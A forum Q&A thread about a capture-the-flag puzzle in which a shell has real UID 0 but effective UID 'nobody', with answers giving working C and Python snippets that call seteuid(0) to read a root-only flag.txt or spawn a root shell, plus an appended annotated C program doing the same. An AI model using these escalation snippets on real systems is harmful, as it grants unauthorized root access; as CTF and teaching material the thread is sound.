I'm participating in a capture-the-flag contest where I must implement some form of privilege escalation to read the flag.txt file. I've noticed that when I run whoami I get the following result:

myHostHere:/$ whoami
nobody

But when I run id, my UID is set to root:

myHostHere:/$ id
uid=0(root) gid=65534(nobody) euid=65534(nobody)

Does this mean it's possible for me to act as the root user, etc., or am I misinterpreting the output?

Edit:

The output of ls -l flag.txt is as follows:

-r--r-----    1 root     root            34 Feb 10 12:00 flag.txt

2 Answers


This can be solved by writing and compiling (with --static) a C program like so on a separate machine:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    /* Allowed without CAP_SETUID: 0 is already the real UID of the process. */
    seteuid(0);
    /* With euid 0 the effective capability set is raised, so this succeeds too. */
    setgid(0);
    /* The child inherits euid 0, so the DAC check on flag.txt passes. */
    system("cat flag.txt");
    return 0;
}

This file can be copied over to the CTF machine, given permission to execute with chmod +x, and run from the tmp folder.

I created a setup very similar to yours. I did it with a debugger (examples: here and there). In the affected shell I have:

$ whoami
nobody
$ id
uid=0(root) gid=65534(nogroup) euid=65534(nobody) groups=65534(nogroup)
$

Then, according to this answer:

File access, and operations that require root privileges, look at the effective UID and GID.

Indeed, this is what happens:

$ ls -l flag.txt
---------- 1 root root 4 Mar 17 08:57 flag.txt
$ cat flag.txt
cat: flag.txt: Permission denied
$

But I can do this:

$ sudo cat flag.txt
foo

Or this:

$ su -
# whoami
root
# cat flag.txt
foo

Or this:

$ sg root 'cat flag.txt'
foo

When you have uid=0, anything that can use the seteuid system call and then read the file can help you. E.g. Python:

import os
os.seteuid(0)   # permitted: the real uid is already 0, so no CAP_SETUID is needed
with open('flag.txt', 'r') as f:   # open() is checked against the new euid
    print(f.read())

Instead of (or in addition to) reading the file you can spawn an elevated shell:

import os
os.seteuid(0)
# argv must not be empty, and the shell needs PATH to find cat,
# so pass a real argv[0] and inherit the current environment
os.execve("/bin/sh", ["/bin/sh"], os.environ)

In this shell you're root; cat flag.txt will work.


Testbed: Debian GNU/Linux 9.
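Added example, not part of either answer above: a small C program that makes the rule both answers rely on explicit. seteuid(2) without CAP_SETUID only lets a process move its effective UID to one of its real, effective or saved UIDs, which is exactly why seteuid(0) works when id shows uid=0 but euid=65534. The program prints the three UIDs, tries to open the file as the current euid, switches euid to 0 only when that rule permits it, and tries again. It assumes Linux/glibc (getresuid is a GNU extension) and defaults to the path flag.txt, which is the hypothetical target from the question; on an ordinary login shell (uid, euid and saved uid all nonzero) it reports that it cannot switch, which is the expected failure mode.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Model of the unprivileged seteuid(2) rule on Linux: without CAP_SETUID a
 * process may only move its effective UID to its real, effective or saved
 * set-user-ID.  With CAP_SETUID any target is allowed. */
int seteuid_allowed(uid_t ruid, uid_t euid, uid_t suid, uid_t target,
                    int has_cap_setuid)
{
    if (has_cap_setuid)
        return 1;
    return target == ruid || target == euid || target == suid;
}

/* Read up to n-1 bytes of path into buf (NUL-terminated).  Returns the number
 * of bytes read, or -1 if the file could not be opened or read.  open() is
 * what the DAC check is applied to, against the *effective* UID/GID and the
 * effective capability set, never the real UID. */
ssize_t read_file(const char *path, char *buf, size_t n)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    ssize_t got = read(fd, buf, n - 1);
    close(fd);
    if (got < 0)
        return -1;
    buf[got] = '\0';
    return got;
}

/* If 0 is already one of our UIDs but not the effective one, switch the
 * effective UID to 0.  No capability is needed for that because of the rule
 * modelled in seteuid_allowed().  Returns 1 if euid is 0 afterwards. */
int regain_root(void)
{
    uid_t ruid, euid, suid;
    if (getresuid(&ruid, &euid, &suid) != 0)
        return 0;
    if (euid == 0)
        return 1;
    if (!seteuid_allowed(ruid, euid, suid, 0, 0))
        return 0;   /* no UID is 0: seteuid(0) would just fail with EPERM */
    return seteuid(0) == 0;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "flag.txt";   /* assumed target */
    char buf[256];
    uid_t ruid, euid, suid;

    getresuid(&ruid, &euid, &suid);
    printf("before: uid=%u euid=%u suid=%u\n",
           (unsigned)ruid, (unsigned)euid, (unsigned)suid);

    if (read_file(path, buf, sizeof buf) < 0)
        perror("read as current euid");
    else
        printf("already readable: %s", buf);

    if (!regain_root()) {
        fprintf(stderr, "could not switch euid to 0 (no real/saved uid is 0)\n");
        return 1;
    }
    getresuid(&ruid, &euid, &suid);
    printf("after seteuid(0): uid=%u euid=%u suid=%u\n",
           (unsigned)ruid, (unsigned)euid, (unsigned)suid);

    if (read_file(path, buf, sizeof buf) < 0) {
        perror("read as euid 0");
        return 1;
    }
    printf("%s", buf);
    return 0;
}
```

Compile with gcc -static -o regain regain.c on a separate machine, as the first answer suggests, and run it in the affected shell; whoami reports nobody because it looks at the effective UID, which is why the program checks getresuid() rather than trusting whoami.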